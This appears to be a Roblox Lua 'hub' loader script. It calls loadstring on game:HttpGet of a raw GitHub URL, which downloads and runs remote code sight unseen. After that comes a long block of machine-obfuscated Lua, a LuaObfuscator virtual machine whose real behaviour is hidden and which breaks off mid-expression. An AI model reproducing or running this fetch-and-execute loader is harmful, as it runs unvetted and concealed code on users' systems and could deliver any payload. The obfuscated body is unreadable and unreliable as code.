-- [[ CYRUS HUB - LOAD ]] --
local GizliLink = "BURAYA_KOPYALADIGIN_LINKI_YAPISTIR"

loadstring(game:HttpGet("https://raw.githubusercontent.com/canieren9-afk/Ell-eyl/main/Ell%20eyl"))()
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v111=v5(v87,v19);v19=nil;return v111;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/((5 -3)^(v32-((879 -(282 + 595)) -1))))%((3 -1)^(((v33-((1639 -(1523 + 114)) -1)) -(v32-((558 + 62) -(555 + 64)))) + 1)) ;return v88-(v88%1) ;else local v89=(1326 -395) -(857 + 74) ;local v90;while true do if (v89==0) then v90=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v90 + v90))>=v90) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==((0 + 0) -0)) then v35=v1(v16,v18,v18);v18=v18 + (118 -(32 + 85)) ;v34=1 + (957 -(892 + 65)) ;end end end local function v22() local v36=350 -(87 + 263) ;local v37;local v38;while true do if (v36==(181 -(67 + 113))) then return (v38 * (610 -354)) + v37 ;end if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (954 -(802 + 150)) + 0 );v18=v18 + (7 -5) ;v36=(2 -1) -0 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 3 + 1 ;return (v42 * (16778213 -(915 + 82))) + (v41 * (38178 + 27358)) + (v40 * (724 -(614 -146))) + v39 ;end local function v24() local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1190 -(1069 + 118))) then if (v48==((859 -(814 + 45)) -0)) then if (v47==(0 -0)) then return v49 * (0 + 0) ;else local v123=0 -(0 -0) ;while true do if (v123==0) then v48=1 + 0 + 0 ;v46=791 -(368 + 423) ;break;end end end elseif (v48==(6433 -4386)) then return ((v47==0) and (v49 * ((19 -(10 + 8))/(0 -(0 + 0))))) or (v49 * NaN) ;end return v8(v49,v48-1023 ) * (v46 + (v47/(2^(494 -(416 + 26))))) ;end if (v43==(6 -4)) then v48=v20(v45,10 + 11 ,54 -23 );v49=((v20(v45,470 -(145 + (1178 -(261 + 624))) )==(431 -(44 + (685 -299)))) and  -1) or (1487 -(998 + 488)) ;v43=1 + 2 ;end if (v43==((1081 -(1020 + 60)) + 0)) then v46=1;v47=(v20(v45,1,792 -(201 + 571) ) * ((1140 -(116 + 1022))^(133 -101))) + v44 ;v43=(1425 -(630 + 793)) + 0 ;end if (v43==(0 -0)) then v44=v23();v45=v23();v43=3 -2 ;end end end local function v25(v50) local v51=0 -0 ;local v52;local v53;while true do if (v51==(9 -7)) then v53={};for v112=1 + 0 , #v52 do v53[v112]=v2(v1(v3(v52,v112,v112)));end v51=9 -6 ;end if ((1750 -(760 + (3871 -2884)))==v51) then return v6(v53);end if (v51==(1914 -(1789 + 124))) then v52=v3(v16,v18,(v18 + v50) -1 );v18=v18 + v50 ;v51=768 -(745 + 21) ;end if (v51==(0 + 0)) then v52=nil;if  not v50 then v50=v23();if (v50==(0 + 0)) then return "";end end v51=2 -1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98) local v91=(function() return 0;end)();local v92=(function() return;end)();local v94=(function() return;end)();while true do if (v91==(0 -0)) then local v118=(function() return 1384 -(746 + 638) ;end)();local v119=(function() return;end)();while true do if (v118==(0 -0)) then v119=(function() return 0 + 0 ;end)();while true do if (v119==1) then v91=(function() return  #" ";end)();break;end if (v119~=(0 -0)) then else v92=(function() return v93();end)();v94=(function() return nil;end)();v119=(function() return 868 -(550 + 317) ;end)();end end break;end end end if (v91== #"!") then if (v92== #":") then v94=(function() return v93()~=0 ;end)();elseif (v92==(1583 -(1535 + 46))) then v94=(function() return v95();end)();elseif (v92== #"xnx") then v94=(function() return v96();end)();end v97[v98]=(function() return v94;end)();break;end end return v91,v92,v93,v94,v95,v96,v97,v98;end;end)();local v55=(function() return function(v99,v100,v101) local v102=(function() return 0 -0 ;end)();local v103=(function() return;end)();while true do if (v102==(0 + 0)) then v103=(function() return 0 + 0 ;end)();while true do if (v103~=0) then else local v124=(function() return 560 -(306 + 254) ;end)();while true do if (v124~=(0 -0)) then else v99[v100-#":" ]=(function() return v101();end)();return v99,v100,v101;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v69= #"{",v60 do FlatIdent_61B23,Type,v21,Cons,v24,v25,v61,v69=(function() return v54(FlatIdent_61B23,Type,v21,Cons,v24,v25,v61,v69);end)();end v59[ #"xxx"]=(function() return v21();end)();for v70= #":",v23() do local v71=(function() return v21();end)();if (v20(v71, #"}", #">")~=0) then else local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if ((286 -(134 + 151))==v106) then v109=(function() return nil;end)();v110=(function() return nil;end)();v106=(function() return 2;end)();end if (v106==2) then while true do if (v107~=(1665 -(970 + 695))) then else local v125=(function() return 0 -0 ;end)();local v126=(function() return;end)();while true do if (0==v125) then v126=(function() return 0;end)();while true do if (1==v126) then v107=(function() return  #":";end)();break;end if ((0 -0)==v126) then v108=(function() return v20(v71,1992 -(582 + 1408) , #"asd");end)();v109=(function() return v20(v71, #"?id=",20 -14 );end)();v126=(function() return 2 -1 ;end)();end end break;end end end if (v107== #"[") then local v127=(function() return 0;end)();local v128=(function() return;end)();while true do if (v127~=0) then else v128=(function() return 603 -(268 + 335) ;end)();while true do if (v128~=0) then else v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 -0)) then local v134=(function() return 1824 -(1195 + 629) ;end)();while true do if ((0 -0)~=v134) then else v110[ #"asd"]=(function() return v22();end)();v110[ #"0836"]=(function() return v22();end)();break;end end elseif (v108== #"/") then v110[ #"-19"]=(function() return v23();end)();elseif (v108==(1 + 1)) then v110[ #"-19"]=(function() return v23() -((243 -(187 + 54))^(827 -(569 + 242))) ;end)();elseif (v108== #"gha") then local v411=(function() return 0;end)();local v412=(function() return;end)();while true do if (v411==(0 -0)) then v412=(function() return 780 -(162 + 618) ;end)();while true do if (v412~=(0 + 0)) then else v110[ #"asd"]=(function() return v23() -((2 + 0)^16) ;end)();v110[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v128=(function() return 1 -0 ;end)();end if (v128==1) then v107=(function() return 2 -0 ;end)();break;end end break;end end end if (v107== #"91(") then if (v20(v109, #"91(", #"19(")~= #"/") then else v110[ #"0313"]=(function() return v61[v110[ #"xnxx"]];end)();end v56[v70]=(function() return v110;end)();break;end if (v107==2) then local v130=(function() return 0;end)();local v131=(function() return;end)();while true do if (v130==(1251 -(721 + 530))) then v131=(function() return 1271 -(945 + 326) ;end)();while true do if (v131==(0 + 0)) then if (v20(v109, #"\\", #"\\")~= #" ") then else v110[2]=(function() return v61[v110[4 -2 ]];end)();end if (v20(v109,1638 -(1373 + 263) ,2 + 0 )== #"[") then v110[ #"-19"]=(function() return v61[v110[ #"gha"]];end)();end v131=(function() return 1001 -(451 + 549) ;end)();end if ((1 + 0)==v131) then v107=(function() return  #"xxx";end)();break;end end break;end end end end break;end if (v106==(0 + 0)) then v107=(function() return 0 -0 ;end)();v108=(function() return nil;end)();v106=(function() return 1 -0 ;end)();end end end end for v72= #"<",v23() do v57,v72,v28=(function() return v55(v57,v72,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1];local v67=v63[5 -3 ];local v68=v63[(2474 -(1058 + 125)) -(993 + 295) ];return function(...) local v73=v66;local v74=v67;local v75=v68;local v76=v27;local v77=1 + 0 ;local v78= -(1 + 0 + 0);local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v104=0 + 0 ,v81 do if ((v104>=v75) or (1293>=4700)) then v79[v104-v75 ]=v80[v104 + (2 -(4 -3)) ];else v83[v104]=v80[v104 + 1 + 0 ];end end local v84=(v81-v75) + 1 + (0 -0) ;local v85;local v86;while true do local v105=0 + 0 ;while true do if (v105==(0 + 0)) then v85=v73[v77];v86=v85[1 + 0 ];v105=1;end if (v105==(530 -(406 + 123))) then if ((4194>=265) and (v86<=(13 + 38 + 1))) then if ((2655<=2908) and (v86<=(1794 -((5112 -3363) + 20)))) then if ((963>651) and (v86<=(3 + 9))) then if (v86<=(1327 -(1249 + 73))) then if (v86<=(1 + 1)) then if (v86<=(0 + 0)) then v83[v85[1147 -(466 + 679) ]]=v85[6 -3 ];elseif ((v86>(2 -1)) or (3503<=195)) then if (v83[v85[1902 -(106 + 1794) ]]~=v85[3 + 1 ]) then v77=v77 + (668 -(89 + 578)) ;else v77=v85[3];end else local v181=v83[v85[2 + 2 ]];if ((1382<=4404) and v181) then v77=v77 + (1899 -(41 + 1857)) + 0 ;else local v359=0;while true do if (v359==(0 -0)) then v83[v85[5 -3 ]]=v181;v77=v85[117 -(4 + (2003 -(1222 + 671))) ];break;end end end end elseif ((v86<=3) or (4857<=767)) then v83[v85[586 -(57 + 527) ]]=v64[v85[1430 -(41 + (3582 -2196)) ]];elseif ((v86==(107 -(17 + 86))) or (4018>4021)) then local v182=v85[1 + 1 ];do return v83[v182](v13(v83,v182 + (1 -0) + 0 ,v85[6 -3 ]));end else v83[v85[5 -3 ]]();end elseif (v86<=(174 -(122 + 44))) then if (v86<=(10 -4)) then local v141=0 + 0 ;local v142;while true do if (v141==(0 + 0)) then v142=v85[2];v83[v142]=v83[v142](v13(v83,v142 + (3 -2) ,v85[3 + 0 ]));break;end end elseif ((v86>7) or (2270==1932)) then local v183=0 + 0 ;local v184;local v185;local v186;while true do if (v183==((1182 -(229 + 953)) -0)) then v184=v85[67 -(30 + 35) ];v185=v83[v184];v183=(1775 -(1111 + 663)) + 0 ;end if (v183==(3 -2)) then v186=v83[v184 + 2 + 0 ];if (v186>(1257 -((2622 -(874 + 705)) + 214))) then if ((v185>v83[v184 + (3 -2) ]) or (3430<=1176)) then v77=v85[1215 -(46 + 277 + 889) ];else v83[v184 + (7 -4) ]=v185;end elseif (v185<v83[v184 + (581 -(361 + 219)) ]) then v77=v85[323 -(53 + 267) ];else v83[v184 + 1 + 2 + 0 ]=v185;end break;end end else local v187=v85[415 -(15 + 398) ];v83[v187]=v83[v187]();end elseif (v86<=((2061 -1069) -(18 + 964))) then if ((v86==(33 -24)) or (1198>=3717)) then local v189=v85[2 + 0 ];v83[v189]=v83[v189](v13(v83,v189 + (3 -2) ,v78));elseif v83[v85[2 + 0 ]] then v77=v77 + (851 -(1 + 19 + 830)) ;else v77=v85[(682 -(642 + 37)) + 0 ];end elseif ((3730>=1333) and (v86==((32 + 105) -(116 + 10)))) then local v191=v85[1 + 1 ];v83[v191](v13(v83,v191 + (739 -(542 + 32 + 164)) ,v85[8 -5 ]));else v64[v85[6 -3 ]]=v83[v85[1 + 1 ]];end elseif (v86<=(10 + 8)) then if (v86<=((22 -13) + 6)) then if ((v86<=(666 -(232 + 421))) or (2152==2797)) then local v143=v85[(455 -(233 + 221)) + (2 -1) ];v83[v143](v83[v143 + (2 -1) ]);elseif (v86>(35 -21)) then v83[v85[1553 -(1126 + 375 + 50) ]][v83[v85[1544 -(718 + 823) ]]]=v85[409 -(118 + 181 + 106) ];else do return;end end elseif ((v86<=(62 -46)) or (1709<588)) then if ((v85[1123 -(118 + 1003) ]==v83[v85[1457 -(666 + 787) ]]) or (3575<=3202)) then v77=v77 + (426 -(360 + 65)) ;else v77=v85[8 -5 ];end elseif (v86==(394 -(142 + 235))) then local v197=v85[9 -(812 -(266 + 539)) ];local v198={};for v327=1 -0 , #v82 do local v328=0 + 0 ;local v329;while true do if (v328==(977 -(553 + 424))) then v329=v82[v327];for v444=(0 -0) -(1225 -(636 + 589)) , #v329 do local v445=0 + 0 ;local v446;local v447;local v448;while true do if ((v445==(1 + 0)) or (4397<3715)) then v448=v446[2 + 0 ];if ((v447==v83) and (v448>=v197)) then local v472=0 + 0 ;while true do if ((v472==(0 + 0)) or (4075<=2245)) then v198[v448]=v447[v448];v446[1]=v198;break;end end end break;end if (v445==(0 -0)) then v446=v329[v444];v447=v446[2 -1 ];v445=2 -1 ;end end end break;end end end else local v199=v85[1 + 1 ];v83[v199](v83[v199 + (3 -2) ]);end elseif (v86<=((239 -138) -80)) then if ((v86<=(772 -(239 + 514))) or (3966>4788)) then if ((3826>588) and  not v83[v85[1 + (1 -0) ]]) then v77=v77 + (1330 -(797 + 422 + 110)) ;else v77=v85[2 + 1 + 0 ];end elseif (v86>(7 + 13)) then v83[v85[2]]=v83[v85[6 -(1018 -(657 + 358)) ]][v85[(3192 -1986) -(373 + 829) ]];else for v330=v85[733 -(476 + 255) ],v85[(2581 -1448) -(369 + (1948 -(1151 + 36))) ] do v83[v330]=nil;end end elseif (v86<=(14 + 9)) then if (v86>(39 -17)) then v83[v85[3 -1 ]][v83[v85[241 -(64 + 174) ]]]=v85[1 + 3 ];else for v332=v85[2 -0 ],v85[339 -(144 + 192) ] do v83[v332]=nil;end end elseif (v86>(240 -(42 + 174))) then local v205=v85[2 + 0 ];v83[v205]=v83[v205]();elseif ((694<=1507) and (v83[v85[9 -7 ]]~=v85[5 -1 ])) then v77=v77 + (2 -(1 + 0)) ;else v77=v85[10 -7 ];end elseif (v86<=(32 + 6)) then if ((3900>=1116) and (v86<=(22 + 9))) then if ((4907>3311) and (v86<=(12 + 16))) then if ((v86<=(1530 -(363 + 1141))) or (3408<=2617)) then local v144=v85[1582 -(1183 + 397) ];local v145={};for v173=2 -1 , #v82 do local v174=v82[v173];for v207=913 -(910 + 3) , #v174 do local v208=v174[v207];local v209=v208[2 -1 ];local v210=v208[1 + 1 + 0 ];if ((3201==3201) and (v209==v83) and (v210>=v144)) then v145[v210]=v209[v210];v208[1 + 0 ]=v145;end end end elseif (v86==((3509 -2334) -(556 + 592))) then if (v83[v85[1 + 1 ]]~=v83[v85[1979 -(1913 + 62) ]]) then v77=v77 + ((2641 -(1552 + 280)) -(329 + 479)) ;else v77=v85[2 + 1 ];end else local v211=v85[5 -3 ];local v212,v213=v76(v83[v211](v13(v83,v211 + (1 -(834 -(64 + 770))) ,v78)));v78=(v213 + v211) -(1934 -(565 + 1368)) ;local v214=0 -(0 + 0) ;for v334=v211,v78 do v214=v214 + (1662 -(1477 + 184)) ;v83[v334]=v212[v214];end end elseif (v86<=((3418 -1912) -(29 + 258 + 1190))) then local v146=v85[2 -(1243 -(157 + 1086)) ];local v147,v148=v76(v83[v146](v83[v146 + 1 + (0 -0) ]));v78=(v148 + v146) -(857 -(564 + (1278 -986))) ;local v149=0 -0 ;for v175=v146,v78 do local v176=0 -0 ;while true do if ((1527 -(389 + (1552 -414)))==v176) then v149=v149 + (2 -1) ;v83[v175]=v147[v149];break;end end end elseif ((2195==2195) and (v86>(334 -(244 + 60)))) then v83[v85[2 + 0 ]]=v83[v85[3 + 0 ]] + v85[480 -(41 + 435) ] ;elseif (v83[v85[(1822 -(599 + 220)) -(938 + 63) ]]==v83[v85[4 + 0 ]]) then v77=v77 + (1126 -(936 + 189)) ;else v77=v85[1 + 2 ];end elseif (v86<=(1647 -(1565 + 48))) then if (v86<=(20 + 12)) then do return;end elseif (v86==(1497 -(157 + 1307))) then v83[v85[1140 -((1556 -774) + 356) ]]=v65[v85[270 -(176 + 91) ]];else local v218=v85[4 -2 ];local v219=v83[v218];local v220=v83[v218 + (2 -0) ];if (v220>(1092 -((2906 -(1813 + 118)) + 117))) then if (v219>v83[v218 + ((1372 + 504) -(157 + 1718)) ]) then v77=v85[3 + 0 ];else v83[v218 + 3 ]=v219;end elseif (v219<v83[v218 + (2 -1) ]) then v77=v85[1029 -(834 + 192) ];else v83[v218 + (10 -7) ]=v219;end end elseif (v86<=(122 -86)) then if ((v86>(1053 -((1914 -(841 + 376)) + 321))) or (3025>3506)) then v83[v85[5 -3 ]]= not v83[v85[(6 -1) -2 ]];else v83[v85[4 -(1 + 1) ]]=v83[v85[2 + 1 ]] -v83[v85[6 -2 ]] ;end elseif (v86==(99 -62)) then local v223=v85[1229 -(322 + 905) ];do return v13(v83,v223,v78);end else local v224=v85[613 -(602 + 9) ];v83[v224]=v83[v224](v13(v83,v224 + (2 -1) ,v78));end elseif (v86<=(1234 -(449 + 740))) then if (v86<=(24 + 17)) then if (v86<=(911 -((2254 -1428) + (905 -(464 + 395))))) then v83[v85[949 -(245 + 702) ]]=v83[v85[9 -6 ]]%v83[v85[2 + 2 ]] ;elseif (v86>(1938 -(260 + (4203 -2565)))) then v83[v85[442 -(382 + 28 + 30) ]][v85[1417 -(1001 + 413) ]]=v83[v85[12 -8 ]];else v83[v85[2 + 0 ]]=v85[5 -2 ];end elseif (v86<=(127 -(921 -(467 + 370)))) then if (v86==(1247 -(902 + 303))) then if (v83[v85[3 -1 ]]==v85[11 -7 ]) then v77=v77 + (2 -1) ;else v77=v85[1 + 2 ];end else local v230=v85[1692 -(1121 + 569) ];v83[v230](v13(v83,v230 + (718 -(373 + 344)) ,v85[2 + 1 ]));end elseif (v86==44) then local v231=v85[1 + 1 ];local v232=v83[v231 + (216 -(22 + 192)) ];local v233=v83[v231] + v232 ;v83[v231]=v233;if (v232>(683 -(483 + (413 -213)))) then if ((v233<=v83[v231 + (1464 -(1404 + 59)) ]) or (736<356)) then v77=v85[8 -5 ];v83[v231 + (3 -0) ]=v233;end elseif ((1171<=2774) and (v233>=v83[v231 + (766 -(468 + 297)) ])) then local v420=562 -(334 + 228) ;while true do if (v420==(0 -0)) then v77=v85[3];v83[v231 + (6 -3) ]=v233;break;end end end else v83[v85[2 -(0 + 0) ]]=v83[v85[1 + 2 ]]/v85[240 -(141 + 95) ] ;end elseif (v86<=48) then if (v86<=(46 + 0)) then v83[v85[4 -2 ]]=v83[v85[6 -3 ]]%v85[1 + (10 -7) ] ;elseif (v86>(4 + 43)) then if ((4108>=312) and (v85[5 -3 ]==v83[v85[3 + 1 ]])) then v77=v77 + 1 ;else v77=v85[1 + 2 ];end else v77=v85[2 + 1 ];end elseif ((v86<=(70 -(4 + 16))) or (679>2893)) then if ((v86>(29 + 20)) or (876<200)) then v83[v85[165 -(92 + 71) ]]=v83[v85[2 + 1 ]]%v83[v85[1372 -((78 -44) + 1334) ]] ;else local v238=0 -0 ;local v239;local v240;while true do if ((766 -(574 + (711 -(150 + 370))))==v238) then for v421=v239 + 1 + (1282 -(74 + 1208)) ,v85[9 -5 ] do v240=v240   .. v83[v421] ;end v83[v85[2 + 0 ]]=v240;break;end if (v238==0) then v239=v85[1286 -(1035 + 248) ];v240=v83[v239];v238=22 -(20 + (2 -1)) ;end end end elseif (v86>(900 -(254 + 595))) then local v241=v85[(607 -479) -(55 + 71) ];local v242=v83[v241 + (2 -0) ];local v243=v83[v241] + v242 ;v83[v241]=v243;if (v242>(1790 -(573 + 1217))) then if (v243<=v83[v241 + (2 -1) ]) then v77=v85[3];v83[v241 + 1 + 2 + 0 ]=v243;end elseif (v243>=v83[v241 + ((1359 -(14 + 376)) -(478 + 490)) ]) then v77=v85[4 -1 ];v83[v241 + (942 -((1237 -523) + 225)) ]=v243;end else local v245=v85[6 -4 ];local v246=v83[v85[8 -5 ]];v83[v245 + (1 -0) ]=v246;v83[v245]=v246[v85[1 + 2 + 1 ]];end elseif (v86<=(70 + 8 + 0)) then if (v86<=(93 -28)) then if (v86<=(864 -(118 + 688))) then if (v86<=(103 -(25 + 23))) then if (v86<=(179 -126)) then v83[v85[1 + 1 + 0 ]]={};elseif (v86==(1940 -(927 + 959))) then v83[v85[6 -4 ]]=v83[v85[735 -(16 + 716) ]]/v85[7 -3 ] ;else v83[v85[2 + 0 ]]();end elseif (v86<=(153 -(11 + 86))) then v83[v85[4 -2 ]]=v85[691 -(364 + 324) ]~=(0 -0) ;elseif ((v86>(136 -79)) or (2325>3562)) then local v251=0;local v252;local v253;local v254;while true do if (v251==(286 -(175 + 110))) then v254={};v253=v10({},{__index=function(v426,v427) local v428=v254[v427];return v428[2 -1 ][v428[9 -7 ]];end,__newindex=function(v429,v430,v431) local v432=v254[v430];v432[1797 -(503 + 1293) ][v432[5 -3 ]]=v431;end});v251=1270 -(1249 + 19) ;end if ((2 + 0)==v251) then for v434=1 + 0 ,v85[1065 -(810 + 251) ] do v77=v77 + 1 ;local v435=v73[v77];if (v435[1 + 0 ]==73) then v254[v434-(1 + 0) ]={v83,v435[3 + 0 ]};else v254[v434-(3 -2) ]={v64,v435[736 -(711 + 22) ]};end v82[ #v82 + (1 -0) ]=v254;end v83[v85[7 -5 ]]=v29(v252,v253,v65);break;end if (v251==((937 -(23 + 55)) -(240 + 619))) then v252=v74[v85[3]];v253=nil;v251=1 + 0 ;end end else v83[v85[2 -0 ]]={};end elseif ((v86<=(5 + (132 -76))) or (3661>4704)) then if (v86<=(1803 -(1344 + 400))) then v83[v85[2 + 0 ]]=v83[v85[408 -(229 + 26 + 150) ]]%v85[4 + 0 ] ;elseif ((v86>(33 + 27)) or (4133<=1928)) then v83[v85[8 
